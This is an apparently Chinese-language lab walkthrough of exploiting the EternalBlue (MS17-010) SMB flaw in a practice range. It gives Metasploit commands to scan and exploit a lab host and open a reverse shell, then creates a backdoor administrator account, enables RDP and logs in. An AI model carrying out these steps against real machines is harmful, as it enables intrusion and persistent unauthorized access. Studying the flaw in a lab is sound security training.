永恒之蓝漏洞
永恒之蓝漏洞

SMB协议
用于共享文件夹
添加用户test2(win下):
1 | net user test2 123456 /add |
将用户加入管理员组:
1 | net localgroup administrators test2 /add |

添加成功
创建一个文件夹用于共享





访问共享文件夹:Win+R,输入 \\ip-address\path


在虚拟机中尝试访问:

查看445端口占用情况:
1 | netstat -ano | grep 445 |

靶场中漏洞利用
拓扑图

打开msfconsole
1 | msfconsole -q |
不使用-q
使用-q

扫描永恒之蓝漏洞
搜索永恒之蓝漏洞ms17-010
1 | search ms17-010 |

使用扫描工具
1 | use 3 |

设置远程主机的ip并执行
1 | set RHOSTS 192.168.2.169 |

利用永恒之蓝漏洞
利用永恒之蓝漏洞进行攻击,这里我们使用第0个工具
1 | use 0 |

注意这里defaulting to后的工具,我们待会儿将使用这个进行反向连接(因为需要受害者主机连接到我们监听的端口)
1 | set RHOSTS 192.168.2.169 |

创建后门账户
1 | shell |

现在输出的都是乱码,我们不喜欢,改一下
1 | chcp 65001 |

解决了乱码问题
现在创建一个后门用户
1 | net user test2 123456 /add |


退出shell
1 | exit |

开启远程桌面
meterpreter中:
1 | run /post/windows/manage/enable_rdp |

新建一个终端
1 | rdesktop 192.168.2.169 |


成功进入后门用户





